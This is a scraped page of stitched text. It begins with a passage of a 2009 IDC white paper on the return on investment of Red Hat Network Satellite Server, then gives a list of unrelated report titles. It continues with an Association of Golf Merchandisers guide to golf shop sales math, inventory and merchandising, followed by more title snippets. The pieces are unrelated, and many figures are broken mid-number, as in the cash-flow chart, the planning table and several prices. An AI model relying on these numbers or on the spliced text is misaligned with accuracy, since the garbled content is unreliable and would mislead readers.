the system is down, we can't sell and that's a revenue impact. In just one hour, we might lose millions of euros, so the impact is huge." Benefit and Cash Flow The annual benefit, investment, and cumulative cash flow over three years are shown in Figure 2. Benefits tend to increase over time as the solution gains greater traction in the organization. Investments are highest in the year Red Hat Network Satellite Server is purchased; once the initial cost is accounted for, investment in the following years declines and levels off over time. Ongoing investment includes annual subscription fees, standard hardware turnover, IT time required to maintain the solution, and staff training. 6 # IDC
7 FIGURE 2 Benefit, Investment, and Cash Flow 1,400,000 1,200,000 1,000, ,000 ($) 600, , , ,000 Initial investment Year 1 Year 2 Year 3 Annual investment Annual benefit Cumulative cash flow Source: IDC, October 2009 Return on Investment The three-year IDC ROI analysis on Red Hat Network Satellite Server is based on initial and annual investments compared with the benefit over the three years. Based on the data gathered from the customers in this study, this solution offers an ROI of 338% and payback occurs at 4.8 months. Table 3 displays the ROI results (details on how these figures are calculated are available in the Appendix) IDC #
8 TABLE 3 Three-Year ROI Category Value Benefit (discounted) $1,202,187 Investment (discounted) $274,410 NPV $927,778 ROI 338% Payback 4.8 months Discount 12% Source: IDC, October 2009 NEED TO MANAGE LINUX SERVERS This ROI analysis is presented in the context of the growing need to manage Linux servers. Linux has grown rapidly in importance as a server operating environment and is being used to deploy an increasing number of functions, including file and print servers, Web servers, and a variety of applications and databases often replacing higher-cost Unix systems. As Linux moves up from a utility role to an enterprise server role, it is not enough for it to be the low-cost server operating environment; it must also be managed to achieve high-availability, security, and performance standards required for business-critical applications. Systems management software is needed to ensure service quality and support such functions as provisioning, configuration management, and change and patch management including security patches and monitoring. SYSTEMS MANAGEMENT BENEFITS Linux systems management software and processes provide key benefits for managing Linux-based servers and applications. These benefits include the following: Better service quality. Systems management software can improve availability and performance with fewer slowdowns and reduced downtime. Downtime has direct costs to the business that come from loss of business opportunity as well as decreased employee and end-user productivity. Leveraging of staff resources. Systems management software can help increase the amount of staff time that can be used for productive work. Automation. Systems management software can be used to automate routine or repetitive tasks, such as server provisioning or applying patches. 8 # IDC
9 Agility. Systems management software can facilitate and greatly reduce the time needed to implement system and application changes. Cost savings and improved ROI. Systems management drives cost savings, including reduced hardware and software costs, reduced IT operational costs, and reduced IT management costs. Benefits also come from increased end-user productivity and enhanced availability of business applications. RED HAT SYSTEMS MANAGEMENT Red Hat Inc. develops, distributes, and supports the Red Hat Enterprise Linux distribution based on the open source Linux kernel. One of the key requirements for Red Hat is to provide systems management support for systems and applications deployed on Red Hat Enterprise Linux servers. Red Hat Network Red Hat Network is a solution that provides systems management services specifically for Red Hat technologies and for the distributed software that makes up the Red Hat Enterprise Linux operating environment, as well as for applications deployed on Red Hat Enterprise Linux. The basic delivery form of Red Hat Network is a remote hosted service, managed by Red Hat, accessed over the Internet. Red Hat Network provides key Linux management functions and also delivers software, patches, and updates for Red Hat Enterprise Linux distributions. Red Hat Network Satellite Server Red Hat Network Satellite Server is a locally deployed version of Red Hat Network designed to be deployed on a management server located in a customer's datacenter, typically behind a firewall. RHN Satellite Server provides the full functionality of Red Hat Network management on a local server, with key benefits that include faster performance, centralized control, and higher scalability. It can be used to manage a larger number of Red Hat Enterprise Linux servers. Core management functionality provided by RHN Satellite Server includes provisioning of new systems, configuration management, change and patch management, monitoring, and enhanced security with less dependence on Internet connections. RHN Satellite Server can manage Red Hat Enterprise Linux systems running on both physical systems and supported hypervisors in virtual environments. CHALLENGES AND OPPORTUNITIES As shown by the results of this ROI study, Linux systems management software can provide a number of key benefits for IT organizations, including increased IT efficiency, operational cost reductions, and service improvements such as reduction in downtime. These factors contribute to making Linux an increasingly viable platform for deploying enterprise-class applications and databases IDC #
10 One challenge for Linux management is to extend functional capabilities to encompass the changes occurring in infrastructure technology, such as the rapidly spreading virtualized infrastructures in the x86 environment. Increasingly, Linux systems management will need to address both the Linux virtual images and the impacts of the virtual infrastructures in which the images are deployed. Another area of high interest is managing Linux in the cloud. As cloud architectures mature, IT organizations will want to manage Linux-based applications in a variety of cloud configurations with emphasis on self-service capabilities, including provisioning, patching, and security management. Ensuring service quality including performance and availability will be an important management concern for Linux-based applications deployed in the cloud. These technological advances pose opportunities for Linux management vendors to develop new and extended functionality for systems management software. Other opportunities exist for increased integration of core Linux management capabilities with major application platforms, commercial databases, and enterprise management suites. The further development of Linux management software by companies such as Red Hat can offer IT organizations the opportunity to achieve positive ROI benefits in expanded areas of their operations. SUMMARY AND CONCLUSION This ROI study is based on data gathered from structured in-depth interviews with representatives from 10 IT organizations that are using Red Hat Network Satellite Server to manage Red Hat Enterprise Linux environments. Based on this study, the IT organizations experienced strong positive returns on their investments, yielding an average 338% ROI over a three-year period over three times the initial investment. In today's tough economic climate, IT organizations are looking for ways to achieve cost savings in the short term. Based on this study, the IT organizations achieved this goal by realizing an average payback period of a short 4.8 months recovering their initial investments well within the first half year of deployment. Another key metric that demonstrates the positive effects of using Red Hat Network Satellite Server is the impact on the number of Linux servers that can be managed by a single Linux administrator. Before deployment, the surveyed IT organizations averaged 28 Linux servers per administrator. After successful deployment, the organizations averaged 54 Linux servers per administrator, essentially doubling the administrators' server management capabilities. In summary, the IT organizations that were interviewed for this study received positive ROI results, with short payback periods, from deploying Red Hat Network Satellite Server to manage their Red Hat Enterprise Linux environments. 10 # IDC
11 APPENDIX IDC's ROI Methodology IDC's ROI methodology measures the efficiency of management software products and processes and uses the findings to calculate ROI for the deployed management software. The method does this in four steps: 1. Evaluates the internal and external costs of administering the systems, networks, and applications before deploying the management software tools. 2. Ascertains the investment in the purchase, implementation, and deployment of the management software tools. It is important to estimate not only the initial purchase cost of software but also the required implementation, integration, and training costs. To measure the total deployment investment required, IDC is careful to include questions not only on the cost of purchasing and setup of the software but also the integration and the annual software maintenance fees. 3. Measures the cost savings and gains in productivity, availability, and efficiency achieved using the management software tools. Portions of the interviews are dedicated to the discovery of cost savings, including both "hard" IT costs, such as savings in software rental and maintenance fees, and "soft" costs, including IT staff productivity, IT management efficiency, and application availability. IT staff productivity. To measure changes in IT productivity, IDC asks about the use of staff time in such deployment and operational areas as setting up servers, deploying and updating software, tracking hardware and software assets, and dealing with user problems. Staff time for these tasks before and after implementation is recorded, together with the fully burdened (i.e., after fringe benefits and overhead) hourly staff salary rate. IT management efficiency. IT management efficiency pertains to efficiencies achieved in user administration and support by obtaining better management scalability. Some questions asked relate to the ability to centrally manage remote locations to achieve reductions in travel costs, while others relate to the additional staff that would be required to support expected growth in the user or server population, with and without the tools. Application availability and user productivity. To measure the effects of application availability, IDC concentrates on determining the effect on user productivity and business revenue caused by downtime by asking questions about systems, network, and application unavailability patterns before and after implementation. The fully burdened hourly salary rates of the user base are also required, and an estimate is sought of the loss of business that would be associated with an hour of downtime. 4. Calculates the payback period and ROI for the deployed enterprise management software. Based on the interview data, IDC calculates the average payback period and rate of return based on the overall cost savings resulting from the investments in RHN Satellite Server. To normalize the data, results are presented in terms of per 100 servers IDC #
12 ROI and Payback Period Calculation Assumptions IDC bases the payback period and ROI calculations on a number of assumptions, which are summarized below: Time values are multiplied by burdened salary (salary + 28% for benefits and overhead) to quantify efficiency and manager productivity savings. Downtime values are a product of the number of hours of downtime multiplied by the number of users affected. The impact of unplanned downtime is quantified in terms of impaired end-user productivity and lost revenue. Lost productivity is a product of downtime multiplied by burdened salary. Lost revenue is a product of downtime multiplied by the average revenue generated per hour. The net present value of the three-year savings is calculated by subtracting the amount that would have been realized by investing the original sum in an instrument yielding a 12% return to allow for the missed opportunity cost. This accounts for both the assumed cost of money and the assumed rate of return. Because every hour of downtime does not equate to a lost hour of productivity or revenue generation, IDC attributes only a fraction of the result to savings. As part of our assessment, we asked each company what fraction of downtime hours to use in calculating productivity savings and the reduction in lost revenue. IDC then taxes the revenue at that rate. Further, because IT solutions require a deployment period, the full benefits of the solution are not available during deployment. To capture this reality, IDC prorates the benefits on a monthly basis and then subtracts the deployment time from the firstyear savings. Copyright Notice External Publication of IDC Information and Data Any IDC information that is to be used in advertising, press releases, or promotional materials requires prior written approval from the appropriate IDC Vice President or Country Manager. A draft of the proposed document should accompany any such request. IDC reserves the right to deny approval of external usage for any reason. Copyright 2009 IDC. Reproduction without written permission is completely forbidden. 12 # IDC
WHITE PAPER Using SAP Solution Manager to Improve IT Staff Efficiency While Reducing IT Costs and Improving Availability Sponsored by: SAP Elaina Stergiades November 2009 Eric Hatcher EXECUTIVE SUMMARY
Sponsored by: VCE Authors: Richard L. Villars Randy Perry May 2015 Business Value Highlights 4.6 times more applications developed/delivered per year 41% less IT time spent keeping the lights on 4.4 times
IDC ExpertROI SPOTLIGHT New Relic Yields 314% ROI for Global Technology Manufacturer Sponsored by New Relic Randy Perry September 2013 Overview As this global technology manufacturer has aggressively embraced
IDC ExpertROI Spotlight Metro Health Giving Time Back to Its Care Providers with VMware Horizon View Sponsored by: VMware Matthew Marden January 2014 Randy Perry Overview Metro Health is an integrated
IDC ExpertROI SPOTLIGHT Pulsant Delivers Agile and Cost-Effective Hybrid Cloud Services with Cisco ACI Sponsored by: Cisco Matthew Marden December 2015 Overview Pulsant is a United Kingdom-based IT infrastructure
Sponsored by: VCE Authors: Richard L. Villars Matthew Marden June 2014 Business Value Highlights Customers using Vblock Systems as a platform for deploying private cloud workloads are realizing significant
Sponsored by: HP and Intel Authors: Elaina Stergiades Rob Brothers Matthew Marden March 2015 The Business Value of Connected Support from HP EXECUTIVE SUMMARY As IT environments increasingly adopt new
Nimble Storage Leverages Operational Data to Drive Its Business with Analytics Delivered by HP Vertica
IDC ExpertROI SPOTLIGHT Nimble Storage Leverages Operational Data to Drive Its Business with Analytics Delivered by HP Vertica Sponsored by: HP Matthew Marden September 2014 Overview Nimble Storage (Nimble)
Major U.S. Department Store Retailer Leverages Oracle Engineered Systems for Greater Business Agility
WHITE PAPER Reducing Cost While Simplifying Administration: Monetizing the Benefits of SAP ASE Sponsored by: SAP Carl W. Olofson June 2014 Randy Perry EXECUTIVE SUMMARY In 2011, SAP asked IDC to study
WHITE PAPER Impact of Juniper Training and Certification on Network Management Activities Sponsored by: Juniper Networks Cushing Anderson January 2014 IDC OPINION IDC believes sufficient training and appropriate
BUSINESS VALUE SPOTLIGHT Improve Data Management and Reduce Infrastructure Costs with Enterprise Application Archiving and Test Data Management: A Case Study of IKON February 2010 Sponsored by Informatica
Organizations that are standardizing today are enjoying lower management costs, better uptime. INTRODUCTION
Top 5 Reasons. to Move to HPE BladeSystem. An IDC InfoBrief, sponsored by HP, now Hewlett Packard Enterprise (HPE) November 2015
Top 5 Reasons to Move to HPE BladeSystem November 2015 Business Value Highlights IDC research shows that organizations migrating to HPE BladeSystem (HPE Blade servers) from traditional rack servers or
W H I T E P A P E R T h e I m p a c t o f A u t o S u p p o r t: Leveraging Advanced Remote and Automated Support
W H I T E P A P E R T h e I m p a c t o f A u t o S u p p o r t: Leveraging Advanced Remote and Automated Support Sponsored by: NetApp Brad Nisbet December 2008 Matt Healey IDC OPINION Global Headquarters:
Sponsored by: Amazon Authors: Larry Carvalho Matthew Marden May 2015 Business Value Highlights 560% Five-year ROI $1.54M Average five-year discounted business benefits per application 64.3% Lower TCO 68.1%
WHITE PAPER Embedding Additional Value into Applications: What Enterprises Need Most from Application Vendors Sponsored by: InterSystems Sandra Rogers January 2010 Stephen D. Hendrick Global Headquarters:
WHITE PAPER The Business Value of Red Hat Integration Products Sponsored by: Red Hat Maureen Fleming December 2014 Matthew Marden EXECUTIVE SUMMARY For this white paper, IDC interviewed six organizations
BUYER CASE STUDY EMC IT Increasing Efficiency, Reducing Costs, and Optimizing IT with Data Deduplication Sponsored by: EMC Corporation Robert Amatruda February 2011 Laura DuBois Global Headquarters: 5
IDC ExpertROI SPOTLIGHT University of Kentucky Leveraging SAP HANA to Lead the Way in Use of Analytics in Higher Education Sponsored by: SAP Matthew Marden April 2014 Randy Perry Overview Founded in 1865
WHITE PAPER Comparing the Total Cost of Ownership of SME On- Premises Business Management Applications and SAP Business By Design Sponsored by: SAP David Bradshaw January 2010 Global Headquarters: 5 Speen
Insight Converged and Integrated Datacenter Systems: Creating Operational Efficiencies Rob Brothers IDC OPINION Enterprise IT has moved away from siloed servers, storage, information, and processes and
34% DOING MORE WITH LESS How Red Hat Enterprise Linux shrinks total cost of ownership (TCO) compared to Windows. I n a study measuring
WHITEPAPER DOING MORE WITH LESS How shrinks total cost of ownership (TCO) compared to Windows I n a study measuring the TCO of Windows and servers, Red Hat Enterprise platforms exhibited 34% lower annual
I D C E X E C U T I V E B R I E F What Can Software as a Service Do for Your Business? November 2010 Global Headquarters: 5 Speen Street Framingham, MA 01701 USA P.508.872.8200 F.508.935.4015 www.idc.com
White Paper Mobile Device and Application Trends Are Mobile Applications Moving to the Cloud? Sponsored by: Cisco Denise Lund April 2014 IDC OPINION The use of mobile devices across job levels and functions
Sponsored by: Microsoft. November 2006. ! Team skill is directly responsible for organizational performance in several key IT functional areas.
Sponsored by: Intel Security Authors: John Grady Randy Perry October 2014 Calculating the Business Value of Next Generation Firewall EXECUTIVE SUMMARY Companies today are facing a difficult dilemma. Unprecedented
WHITE PAPER Integrated Application Life-Cycle Management: Accelerating Innovation, Reducing Costs, and Improving Quality Sponsored by: SAP Melinda-Carol Ballou April 2010 Global Headquarters: 5 Speen Street
2 Golf Retail Math: The Basics It is necessary to understand some basic elements of retail math to successfully plan your golf shop's inventory, sales and profits. 1. Calculating Profit and Loss. The basic formula is: Sales - Cost of Sales (cost of goods sold) = Gross Margin (gross profit) - Other Expenses (such as payroll, supplies, utilities, etc.) = Net Profit (return on your investment) 2. Cost of Sales Percentage: A good measure of your golf shop's profitability is its cost of sales percentage. The lower the cost of sales percentage, the higher the profits. Industry benchmarks for average cost of sales percentages range from a low of 55.5% at resort golf shops to a high of 68.8% at golf shops at private country clubs. See chart on page 14 for AGM member sales statistics. Example: To compute your cost of sales percentage, divide cost of sales by sales: Cost of Sales $300,000 (at retail) Divided by Sales $500,000 (at retail) Equals Cost of Sales Percentage 60% 3. Markup: The difference between the wholesale cost and the original retail price. Generally, golf equipment receives a 20-30% markup, apparel receives at least a 52% markup, while some accessory items receive a considerably higher markup. For example, a logoed ballmarker that cost 67 cents might easily retail for $ Markdown: Any reduction in retail price that is required when customers will not pay the original retail price. Markdown merchandising is a 12-month, 52-week responsibility! Recommendation: The Association of Golf Merchandisers recommends a 90-day markdown policy. That is, items not sold within 90 days of original receipt should be marked down to clear the items from stock. Markdowns should be taken year round and tracked accurately by vendor. High markdown vendors should be replaced with more profitable vendors for the proceeding season. 5. $ Per Round: An analysis to demonstrate the relationship between sales and the number of persons who play golf at your facility. Example: To compute, dollar-per-round, divide sales by rounds. 2
3 Sales $500,000 Divided by Rounds Played 50,000 Equals Dollar-Per-Round $10.00 Industry benchmarks for average dollar-per-round range from a low of $11.85 at "public" golf facilities (daily fee, semi-private, municipal) to a high of $20.46 at golf shops at resorts. See chart on page 14 for AGM member sales statistics. 6. $ Per Square Foot: An analysis to demonstrate the relationship between sales and the number of square feet of available selling space. Example: To compute dollar-per-square-foot, divide sales by shop square footage. Sales $500,000 Divided by Shop Square Footage 1500 Equals Dollar-Per-Square-Foot $ Industry benchmarks for average dollar-per-square-foot range from a low of $358 at shops at private country clubs to a high of $548 at golf shops at resorts. See chart on page 14 for AGM member sales statistics. 3
4 Merchandise Planning The merchandise planning, or budgeting, process consists of: 1. Forecasting sales by classification (merchandise categories such as shirts, shorts, headwear, irons and balls) for each season or year. A sample merchandise planning form, by classification, for a daily fee golf shop is provided on the next page. Your planned sales should be based on: Last year's actual sales and rounds. Plus or minus any anticipated changes for the coming year. For example, will your facility host more or less tournaments and outings this year compared to last year? Are you planning more sales events/promotions (advertising, direct mail) for Father's Day, Mother's Day, Christmas? Is there increased competition from other golf facilities or off-course stores in your area? 2. Determining inventory levels and deliveries by classification for each month. The amount of beginning inventory for the season or year should be adequate to cover anticipated sales for approximately the first 90 days. Ending inventory should be low enough to prevent excessive markdowns during the last month of the season. 3. Monitoring open-to-buy monthly. Simply stated, "open-to-buy" is the amount of money you have each month to spend on new merchandise that will bring your inventory level to the planned amount. In other words, once you have planned your sales and inventory by classification, you need to determine, at the beginning of each month: If new merchandise purchases are needed in any classification. If so, how much should you order and when should it be delivered? If you need to cancel merchandise that is on order or push delivery to a later date. If you need to markdown slow-moving or end-of-season merchandise. Open-to-buy planning can be done manually for small shops (using accounting ledger sheets) or by computer using a spreadsheet program such as Excel or Quatro Pro. Several companies offer open-to-buy planning software programs for purchase. Another company offers merchandise forecasting consulting services (you input the inventory numbers by classification, they analyze your numbers each month and tell you if you are overbought and underbought and in what classifications). If you are interested in an upto-date open-to-buy resource list, contact the Association of Golf Merchandisers. 4
5 Sample Merchandise Planning (Budgeting) Form (The figures shown here are a sample and should not be used as your planning guide!) Department/Classification Planned Sales $ (at retail) Planned Sales/Inventory % Men's Shirts $100,000 20% Men's Sweaters 20,000 4% Men's Slacks 10,000 2% Men's Shorts 20,000 4% Men's Outerwear 20,000 4% TOTAL MEN'S Total Men's $170,000 Total Men's 34% Women's Shirts $ 30,000 6% Women's Sweaters 10,000 2% Women's Slacks 5,000 1% Women's Shorts 10,000 2% Women's Outerwear 5,000 1% TOTAL WOMEN'S Total Women's $ 60,000 Total Women's 12% Woods $ 25,000 5% Irons 22, % Putters 5,000 1% Wedges 2,500.5% Balls 65,000 13% Bags and Accessories 25,000 5% TOTAL HARDGOODS Total Hardgoods $145,000 Total Hardgoods 29% Headwear $ 55,000 11% Gloves 25,000 5% Shoes 25,000 5% Gifts 20,000 4% TOTAL MISC Total Misc $125,000 Total Misc 25% TOTAL PLANNED SALES $500, % 5
6 Inventory Control The most important component of a profitable golf retail operation is inventory control. By that we mean bringing in just the right amount of inventory at just the right time. As mentioned in the previous section, Merchandise Planning, at the beginning of each month you need to determine if, when and how much new merchandise you need to bring into the golf shop. The biggest reason why golf pro shops are not profitable is because too much money is tied up in too much inventory. What are the biggest causes of too much inventory? Overbuying Increased competition Late deliveries Incorrect buying Local recession Adverse weather conditions To avoid an overbought, over-inventoried situation, you need to focus on two things: Turnover and Stock-to-Sales Ratios. 1. Turnover: The number of times an average retail inventory is sold within a given period of time, usually a year. Example: To arrive at turnover for the year, divide the total sales for the year by the average inventory: Sales $500,000 (at retail) Divided by Average Inventory $125,000 (at retail) = Inventory Turns 4 Recommendation: The Association of Golf Merchandisers (AGM) recommends a turnover rate of 2 times per season (approximate 6 month period) or 4 times per year. Faster turnover rates occur with lower average inventory and result in increased profitability. 2. Stock-to-Sales Ratio: A calculation that reveals how long the amount of stock (inventory) on hand will last if sales remain constant. Most golf pro shops carry two to three times more inventory than necessary. Recommendation: The AGM recommends that your stock (inventory) should equal no more than you will sell during the next three months. 6
7 Checklist of what to do if your inventory level is too high: Evaluate every purchase order. Do you really need that merchandise? Do you need that many? Do you need it when it is scheduled to arrive or should you delay it? Check your stock-to-sales ratios in each classification. Can you do with less? Prepare an aged inventory list. Unlike wine, merchandise does not get better with age. Identify and clear out seasonal merchandise and anything over a year old, with the exception of basics. Convert those dogs to cash! Have a clearance sale, employee sale. Clean out your stock room. Send back any damaged items for credit, or even better, for a refund! Reward staff for increasing sales. Teach, eat, sleep, breath suggestion selling. Physical Inventory. This is the actual counting and listing of goods in stock at a given time, together with the cost of each item. Taking a physical inventory is one of the most important aspects of inventory control, planning and profit. How often should you take a physical inventory of your golf shop merchandise? Recommendation: The Association of Golf Merchandisers recommends golf shop physical inventories be taken monthly or quarterly. Timing depends on the accuracy of your computerized/book inventory systems in place. Shrinkage-sensitive and high value merchandise should be inventoried monthly for loss prevention. Buying Strategies and Tips There is so much excellent merchandise in the golf marketplace, it's difficult to make incorrect choices. However, if you want to maximize your shop's profitability, follow these strategies and tips: 1. Understand your customers. Who are they? What type of merchandise do they want? At what pricepoints will they buy? What sizes, colors, styles, brands? If you don't know the answers to these questions, give or mail your customers a questionnaire. A sample is 7
8 contained in the AGM Merchandise Manual. 2. Buy for your fixtures. Bring photos to golf shows and apparel markets. Know how many, what type and how many units each fixture will carry. Warning: Do not plan to simply fill all of the available space with merchandise. If you find more merchandise is required to fill space than a sound inventory plan would require, some of the space must be used for displays and broader aisles. 3. Create a smart vendor structure. Choose 2-5 "core vendors" and make a statement with those brands. Your core vendors want to help you make money. Partner with them on: Co-op advertising, signage, free logoing, display fixture programs. Stock program in basics. Additional dating, discounts. Trunk/fashion shows and product demonstrations at your club. 4. Bring in smaller quantities of fresh new merchandise frequently. 5. Observe industry trends. Attend at least one major golf show and one apparel/gift market each year. Read trade publications. Communicate with fellow golf merchandisers and attend seminars, such as those sponsored by the Association of Golf Merchandisers. 6. Look for profit-builders such as closeout or off-price merchandise, private labeling, custom items, regional crafts, gifts, unusual items, accessories/add-ons and small impulse items that warrant a big markup. Take advantage of discounts offered through the NGCOA Smart Buy program. 7. Test new product in small quantities. If your customers don't like it, you haven't lost a fortune. If they love it, you can always reorder. 8. Buy the product, not the sales representative. 9. Write your own orders. 10. Specify delivery windows (a definite period of time to accept merchandise). This is designated by a start and stop shipment date. You need not accept merchandise not shipped on time or complete. Delivery Window Example: Start date - 1/1/02 Complete - 1/31/ Carefully check incoming merchandise against the original order. Make sure your orders are shipped complete. Check for substitutions, damaged merchandise, incorrect sizes or logos. Immediately make arrangements with the vendor(s) for returns and refunds. 12. Price all merchandise and get it on the floor as quickly as possible. Recommendation: The Association of Golf Merchandisers recommends that all merchandise be checked in, entered in inventory, tagged, steamed (if apparel) and displayed on the selling floor within 24 hours of arrival. 8
9 On-Site Buying Checklist: Preparing for the sales call: Review last year's sales figures. Examine sell-through of product. Observe value-added services given such as discounts, dating, off-price opportunities, co-op advertising, signage, etc. Observe problems, such as back orders and late shipments, and how to resolve them for the coming year. Meeting with the sales representative: Be punctual. Find a comfortable place where distractions and interruptions can be avoided. Share the vendor's last year performance with the sales rep. After reviewing the product line, ask the sales rep to put the collection together as the customer would purchase it. Find a key or pivotal piece and work the collection around it. As the line is reviewed, assign a retail value to each item. Would your customers purchase this item at the assigned retail price? If you feel you cannot reach your markup objectives (full retail value), do not purchase the items. Try to envision the merchandise in your store. Some questions to ask include: 1. Who is the customer for these items? 2. When will it be delivered? 3. How is it going to look? 4. Where is it going to be/what fixtures? 5. With what other lines will it be merchandised? While the representative is present, review your event calendar for the year. Schedule appointments for trunk shows, sales seminars and product demonstrations. 9
10 Golf Show/Market Preparation Checklist Pre-Plan: Review industry publications for trends: fabrics, fabrications, colors, styles. Check inventory for reorders. Identify fast moving classifications and trends in your current inventory. Check your Merchandise Plan. Know how much money in each classification you have to spend. Pre-Set Appointments: Allow time to walk the Show or Market. Make core vendor appointments to help structure your buy. If time is limited, get core vendors to highlight their lines. Set appointments by classification to make product comparison and features/benefits easier to analyze. Set appointments by geographic area to eliminate walking time between appointments. Walk the Show: Look at the total picture by taking time to shop and interpret the market. Identify trends, look at direction changes such as colors, silhouettes, classifications. Evaluate the merchandise for its ability to cross vendors. This will maximize sellthrough and extend the retail life of the product. Think of how customers will react to these changes in the marketplace. 10
11 Shop Layout and Visual Presentation To maximize your golf shop's sales potential, attention must be given to the store environment -- how it looks (outside and inside), smells and even sounds. Following are some statistics, guidelines and ideas to make your shop inviting and keep customers coming back. Layout Strategies: The physical layout and pathways of your shop should be designed to take advantage of known customer movement patterns. Prime Real Estate: The front third of the shop is your primary "real estate." Merchandise placed in this portion of the shop will get the most attention by customers. Swamp Land: The rear one-third of the shop is your "swamp land." Notice how grocery stores place milk in the rear of the store to attract customers through the entire store. Consumer Behavior: 80% of customers turn counter-clockwise as they enter a store. This makes the right front entrance of your shop most important. Shop Horizon: When considering fixture layout, arrange lower profile fixtures in the front of the store, graduating to higher elevations in the rear. This will allow your customer a much clearer overview of the golf shop. If customers can see the merchandise displayed as they enter, it's easier to draw them into the shop. Departments: To make it easier for customers, your shop should be divided into departments: ladies, men's and equipment. Use fixtures to separate one department from another. Situate the ladies' department closest to the dressing rooms. Sale racks or tables should be placed in the back of each department to avoid disrupting the flow or look of the store front. Proper Traffic Patterns: A good traffic pattern doesn't have to be complicated. Start with the basics. What do your customers want most? The obvious answer is to play golf. If possible, locate the service counter to the rear of your shop. Visual Presentation: There are three elements to an effective visual display: 1. Merchandise: Showcase new arrivals, slow-moving items to generate interest/sales, or pick up a holiday or special theme for a tournament or other event. 2. Signage: Signs should call attention, give direction and inform the customer about the merchandise. Signs should be uniform and printed (not hand made). 3. Props: Use props to attract attention to the merchandise. Keep them simple, alive and uncluttered. 11
12 Visual Display Tips and Ideas Utilize 1 mannequin or form per 100 square feet of selling space. Mannequins allow you to show complete outfits to entice the customers to buy more than one item. Floor changes (rearrangement of floor units, wall fixtures and merchandise departments) should be scheduled once every 4 to 6 weeks. Rotation gives the golf shop a fresh new appeal and maximizes exposure of product. Merchandise displays (in windows, entryway, counter tops, ends of faceouts, tops of fixtures) should be changed as often as needed, at least once a week. Displays at the ends of aisles should be large and designed to attract customers with special pricing. They compel customers to make unplanned purchases along the way. Organize apparel by collections, color (light to dark), sizes (small to extra large) and sleeve length (from the least amount of fabric to the most). All hangers should be of uniform material (all wood or all plastic). Hanger necks should face in one direction -- to the left. The hanger should form a question mark. 12
13 Merchandise Sales You can be the most imaginative and attentive buyer in the business but if the merchandise you bring into the shop is not sold, your expertise and effort will be wasted. It is, therefore, imperative, that a schedule of planned promotions be created at the beginning of each season or year and that the entire golf shop staff is trained and motivated to sell. Pre-planned sales promotions and events: These might include: Specialty clinics or seminars Demo days Fashion and trunk shows Golf tournaments and corporate outings Seasonal promotions such as Father's Day, 4th of July, Christmas Clearance sales and discount coupons For each event, make sure: All staff members know about the event. Sufficient merchandise will be on the selling floor for the event. Customers have been given plenty of advance notice about the event thru direct mail, club newsletters, newspaper ads, club website/ , signage, events board. Selling Techniques: Effective selling involves the following eight steps: 1. Prepare for the sale. Know the merchandise, its benefits and features and where it is located on the sales floor. 2. Greet the customer. Let the customer know you are aware he or she is there and you are willing to help. Ask open-ended questions such as, Did you have lunch with us today? How was your game today? What did you shoot? 3. Discover the customer's needs. Why did he or she come into the shop? Is this a purchase for you, a gift or a special occasion? Do you have a price range in mind? 4. Present the product with words and action. Invite the customer to handle the merchandise, try it on or try it out. Demonstrate the product whenever possible. 5. Overcome objections. If you sense hesitation, ask questions. Find out why the customer is objecting. 6. Close the sale. To make the sale, all you need to do is ask. 7. Create multiple sales. Make suggestions for items to compliment the purchase. 13
14 8. After the sale. Follow through is critical to create repeat customers. Keep a client book or file of "Preferred Customers." Write a thank you note. How Does Your Golf Retail Operation Measure Up? Assess your golf retail operation by answering these questions: 1. What were your total golf shop merchandise sales this past year? $ 2. What were your cost of sales this past year? - $ 3. What was your gross profit? (Sales minus cost of sales) = $ 4. What was your cost of sales percentage? (Cost of sales divided by sales) % 5. What was your dollar per round? $ 6. What was your dollar per square foot? $ Golf Merchandise Sales Statistics Each year the Association of Golf Merchandisers surveys its members to collect important statistics relating to average total sales, average dollar per round and average dollar per square foot. The 2000 year-end statistics for on-course golf shops are as follows: AGM Member Survey Year-End Statistics Private Public Resort Number of rounds played 37,228 48,796 43,585 Shop square footage Gross merchandise sales $488,000 $578,000 $892,000 Average $ per round $13.09 $11.85 $
Retail 2.0 Presented By: Global Purchasing Companies Top 5 Rules before you go into the retail business 1.You are not opening this store/boutique for your ego. This is a business to make money. 2. You
HOW MUCH DO YOU NEED? Presented By: Tracy Moffatt AGM Education Team K&K Consulting Many stores carry 2 to 3 times more inventory than they need Many stores have no idea how much inventory they need to
Fashion Industry 101: How to start a fashion line in today s market. Presented by: Global Companies Global Group Showroom Before I get started This is a business to make money Design is an art, fashion
inventory management - the four keys unlock your potential WHY INVENTORY MANAGEMENT? Purchasing frames can be a time-consuming, frustrating and expensive endeavor - both in staff time and product cost.
Is Your Business Ready For the Holidays? 7 Steps to Improve Your Online Holiday Sales 2 7 Steps to Improve Your Online Holiday Sales Every year it seems as if the holiday decorations go up a month earlier
Opening a Christian Bookstore A brief paper outlining a few items to consider when opening a Christian bookstore Jack Scott, Director of Training and Member Development ChristianTrade Association International
Click on a job title to see examples of descriptive information about the job. Click on a link between job titles to see the critical development experiences needed to move to that job on the pathway.
Retail Math Reference and Glossary of Terms Name Description Formula Example Age (Weeks Active) The amount of weeks an item is on the selling floor. (Weeks Active implies the quantity of weeks an item
Business Planning and Operations Study Guide The Value of Business Planning Achieve business objectives based on the facility s mission Anticipate and prepare for opportunities and problems that could
ONE OF A CATALOGER'S LARGEST ASSETS is its inventory but if not controlled, inventory can quickly become one of its largest liabilities in terms of cash flow and overstock. Although catalogers try to control
= =The video will take place in a Buy & Save store and will be narrated by an actor playing a Buy & Save manager.= =
Nash Finch Companies Buy & Save Video Script = =The video will take place in a Buy & Save store and will be narrated by an actor playing a Buy & Save manager.= = Welcome to my store it may look a little
SCORE Counselors to America s Small Business INVENTORY CONTROL Why Inventory Control? Control of inventory, which typically represents 45% to 90% of all expenses for business, is needed to ensure that
26 THE ROAD TO THE CONSUMER Insurance. In setting up any kind of business you will need to consider several types of insurance coverage, including 8 : General business liability, including product liability
Keep Them Coming Back Loyalty Programs and Client Retention by Dori Soukup In the early 1980s, American Airlines goal was to increase retention and provide their clients with something extra special. The
HBB-PRS.005 IF YOU WANT TO MARKET YOUR HOBBY AND YOUR HOBBY IS A CRAFT... 1. Be constantly striving to improve your product...your skills, your design sense, your creativity. Keep your ideas new and fresh.
Careers in the Fashion Industry Careers in the Fashion Industry In the fashion industry, there are careers for many people in many different jobs responsible for the inspiration, conception, production,
Store Image Chapter 13 Store Layout and Design Store Image is the overall perception the consumer has of the store s environment. Elements That Compose the Store Environment Objectives of the Store Environment
Effective Replenishment Parameters By Jon Schreibfeder EIM Effective Inventory Management, Inc. This report is the fourth in a series of white papers designed to help forward-thinking distributors increase
